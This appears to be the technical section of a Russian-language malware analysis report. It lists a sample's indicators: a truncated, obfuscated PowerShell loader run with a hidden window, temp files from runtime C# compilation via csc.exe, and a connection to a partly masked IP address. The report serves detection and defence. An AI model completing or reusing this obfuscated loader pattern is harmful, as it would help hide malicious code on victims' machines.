Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function mcd2a64 {param($h92b6)$haa52='nab35';$d895a14='';for ($i=0; $i -lt $h92b6.length;$i+=2){$afd579c=[convert]::ToByte($h92b6.Substring($i,2),16);$d895a14+=[char]($af...
- %TEMP%\zmgif_oz.0.cs
- %TEMP%\zmgif_oz.cmdline
- %TEMP%\zmgif_oz.out
- %TEMP%\csc71f6.tmp
- %TEMP%\res7206.tmp
- %TEMP%\zmgif_oz.dll
- %TEMP%\res7206.tmp
- %TEMP%\csc71f6.tmp
- %TEMP%\zmgif_oz.cmdline
- %TEMP%\zmgif_oz.out
- %TEMP%\zmgif_oz.dll
- %TEMP%\zmgif_oz.0.cs
- %TEMP%\zmgif_oz.pdb
- '51.##.171.194':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function mcd2a64 {param($h92b6)$haa52='nab35';$d895a14='';for ($i=0; $i -lt $h92b6.length;$i+=2){$afd579c=[convert]::ToByte($h92b6.Substring($i,2),16);$d895a14+=[char]($af...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zmgif_oz.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7206.tmp" "%TEMP%\CSC71F6.tmp"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zmgif_oz.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7206.tmp" "%TEMP%\CSC71F6.tmp"